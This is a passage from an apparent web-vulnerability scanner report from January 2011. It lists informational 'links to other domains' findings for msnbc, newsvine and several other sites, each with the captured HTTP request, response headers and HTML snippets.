<li><a href="http://www.lifeslittlemysteries.com/what-is-net-neutrality-and-why-should-you-care-1146/">What's Net Neutrality, and Why Should You Care? </a>
...[SNIP]...
<em>Natalie Wolchover is a staff writer for <a href="http://www.lifeslittlemysteries.com/">Life's Little Mysteries</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets/"></a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li class="i1 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/zWECusFor0E/bartenders-help-veterans-mental-health-services-110128.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/zWECusFor0E/bartenders-help-veterans-mental-health-services-110128.html">

<span property="dc:title">
...[SNIP]...
<li class="i2 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/bOWHIxnGgs4/coping-with-seasonal-affective-disorder-110125.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/bOWHIxnGgs4/coping-with-seasonal-affective-disorder-110125.html">

<span property="dc:title">
...[SNIP]...
<li class="i3 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/VjLFlF9ZwpM/pot-soda-vs-four-loko-which-is-more-dangerous-012811.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/VjLFlF9ZwpM/pot-soda-vs-four-loko-which-is-more-dangerous-012811.html">

<span property="dc:title">
...[SNIP]...
<li class="i4 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/r_9t7f7UkmQ/orangutan-conservation-bts-110128.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/r_9t7f7UkmQ/orangutan-conservation-bts-110128.html">

<span property="dc:title">
...[SNIP]...
<li class="i5 " about="http://feeds.livescience.com/~r/Livesciencecom/~3/bOkkdE2_G1Q/great-pyramid-of-giza-houses-secret-rooms-110128.html">

<a class="h6" href="http://feeds.livescience.com/~r/Livesciencecom/~3/bOkkdE2_G1Q/great-pyramid-of-giza-houses-secret-rooms-110128.html">

<span property="dc:title">
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7543"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

22.445. http://www.msnbc.redacted/id/41327694/ns/us_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327694/ns/us_news/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/41327694/ns/us_news/?GT1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 58924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/ap/gays in military-393706914_v2.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">
   
    <a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41327694/ns/us_news/"></a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41327694/ns/us_news/"></a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

22.446. http://www.msnbc.redacted/id/8004316/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/8004316/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/8004316/?from=en-us_msnhp HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sun, 30 Jan 2011 01:57:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:57:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwBTfCkAAAAApMVETRqCDgWkxURNAQAAAAAAAAAAAAAAAACkxURNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
Set-Cookie: SSSC=108.G5567792347586920986.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=pMVETQE; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
Set-Cookie: MC1=GUID=6db8003adf854298adce0bc40466cda9; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 165444

<html><head>
<!-- // --><script language='javascript' type='text/javascript'>
<!--
   req_108_1296352676=new Image();
req_108_1296352676.src='/__ssobj/ard.png?5567792347586920986_1_0-108-'+(26891*48207+
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://msnbcom.112.2O7.net/b/ss/msnbcom/1/H.15.1--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="">
</noscript>
...[SNIP]...
<li class="i1 hotmail">
<a href="http://www.hotmail.com/">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com/">More</a>
...[SNIP]...
<li class="i7">
<a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9">
<a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14">
<a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18">
<a target="_blank" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li class="i19">
<a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20">
<a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="i3 bing" id="bing">
<a href="http://www.bing.com/"><span>
...[SNIP]...
<li class="i2 show-today">
<a href="http://today.msnbc.com/">TODAY</a>
...[SNIP]...
<li class="i3 show-nightly">
<a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp">
<a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline">
<a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow">
<a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball">
<a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc">
<a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine">
<a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock">
<a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li grid="38129929" class="i6">
<a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<h2><a href="http://today.msnbc.com/">TODAY</a>
...[SNIP]...
<h2><a href="http://nbcsports.msnbc.com/id/3032113/ns/sports/">NBC Sports</a>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.newsweek.com">Newsweek</a></li>
<li><a href="http://www.newsvine.com">Newsvine</a></li>
<li><a href="http://www.everyblock.com">EveryBlock</a>
...[SNIP]...
<li><a href="http://www.breakingnews.com">Breaking News</a>
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/id/3032113/ns/sports">Sports</a>
...[SNIP]...
<div class="button btn-7"><a href="http://www.alerts.msnbc.com/">&nbsp;</a></div>
<div class="link"><a href="http://www.newsletters.msnbc.com/">Sign up for newsletters &amp; alerts</a>
...[SNIP]...
<div class="button btn-3"><a href="http://www.facebook.com/msnbc/">&nbsp;</a></div>
<div class="link"><a href="http://www.facebook.com/msnbc/">msnbc.com on Facebook</a>
...[SNIP]...
<li><a href="http://privacy.microsoft.com/en-us/default.mspx">MSN Privacy</a>
...[SNIP]...

22.447. http://www.neudesicmediagroup.com/Advertising.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neudesicmediagroup.com
Path:   /Advertising.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Advertising.aspx?site=Silverlight HTTP/1.1
Host: www.neudesicmediagroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:23:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=5kpaue2f1i25ymtknnkzbtlb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 11100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Contact Us |
...[SNIP]...
content="online advertising, microsoft advertising, internet advertising, web advertising, advertising network, buy advertising, sell advertising, internet ads, media solutions for publishers" />

   <script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js?v=3"></script>
...[SNIP]...
</a>
                       <a href="http://twitter.com/NeudesicMedia" class="twitter">
                           <img src="/resources/images/spacer.gif?v=3" alt="Twitter" width="24" height="23" border="0" /></a>
                       <a href="http://www.facebook.com/pages/Neudesic-Media-Group/106923456664" class="facebook">
                           <img src="/resources/images/spacer.gif?v=3" alt="Facebook" width="24" height="23" border="0" />
...[SNIP]...
<div class="map">
                   <a target="_blank" href="http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=Neudesic+LLC,+Irvine,+CA&sll=33.649208,-117.743568&sspn=0.106745,0.222988&gl=us&g=8105+Irvine+Center+Dr,+Irvine,+Orange,+California+92618&ie=UTF8&hq=Neudesic+LLC,&hnear=Irvine,+CA&ll=33.657781,-117.768116&spn=0.106735,0.222988&z=13&iwloc=A&cid=5022547561072180428">
                       <img src="/resources/images/map.jpg?v=3" alt="Map" />
...[SNIP]...
<p class="leftt">
               Neudesic, LLC &copy;
               2011. All Rights Reserved. Neudesic Media Group is a division of Neudesic, LLC. - <a rel="nofollow" href="http://www.neudesic.com/" target="_blank">www.neudesic.com</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s18.sitemeter.com/js/counter.js?site=s18neumedia"></script>
   <noscript>
       <a rel="nofollow" href="http://s18.sitemeter.com/stats.asp?site=s18neumedia" target="_blank">
           <img src="http://s18.sitemeter.com/meter.asp?site=s18neumedia" alt="Site Meter" border="0" /></a>
...[SNIP]...

22.448. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/newsletters

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_nv/accounts/msnbc/newsletters?affiliate=todayshow.com&categoryFilter=today HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:59:01 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa2558f56ab4ceb5950694a90bd5037a; expires=Sat, 25-Jan-2031 01:59:01 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 18080


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...
<link rel="shortcut icon" href="http://lib.newsvine.com/chrome/today/images/favicon.ico" type="image/x-icon" />
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://www.msnbc.redacted/default.ashx/id/36009898#msnbc.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

22.449. https://www.newsvine.com/_nv/accounts/register

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/register

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_nv/accounts/register?referrer=toolbar HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:59:01 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=e0f0a5a558fe414b9dba8fc387d2b490; expires=Sat, 25-Jan-2031 01:59:01 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 11767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<meta name="verify-v1" content="lOHw3AgC2uTfC5d6ZebPJTLQWI+imhirT6wlZJrJBuw=" />
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

22.450. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outblush.com
Path:   /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.outblush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11007
Date: Sun, 30 Jan 2011 02:01:04 GMT
Age: 0
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerbargainist_POOL=1492848812.52514.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/ico" />
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://feeds.feedburner.com/outblush" />
<script language="Javascript" type="text/javascript">
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/Outblush/hp;kw=top;tile=1;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/Outblush/hp;kw=top;tile=1;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</a> | <a href="http://feeds.feedburner.com/outblush">RSS Feed</a> <a href="http://feeds.feedburner.com/outblush"><img src="http://ui.ibsrv.net/ibsrv/res/src:www.outblush.com/get/i/feed.gif" width="12" height="12" alt="RSS" border="0" class="feed" /></a>
...[SNIP]...
<br />
Looking for coupons and deals from your favorite retailers? Visit <a href="http://www.bargainist.com">The Bargainist: your personal coupon shopper</a><br />
<a href="http://www.internetbrands.com/ib/privacy/travel?site=www.outblush.com">Privacy Policy</a>. <a href="http://www.internetbrands.com/ib/terms/travel?site=www.outblush.com&hasRSS=true">Terms of Use</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://outblushcom.skimlinks.com/api/skimlinks.js"></script>
...[SNIP]...

22.451. http://www.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /a.z?s=143&p=3&blipid=14568 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 01:25:11 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:35:11 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 44 ms
Vary: Accept-Encoding
Content-Length: 22873

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.redacted/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
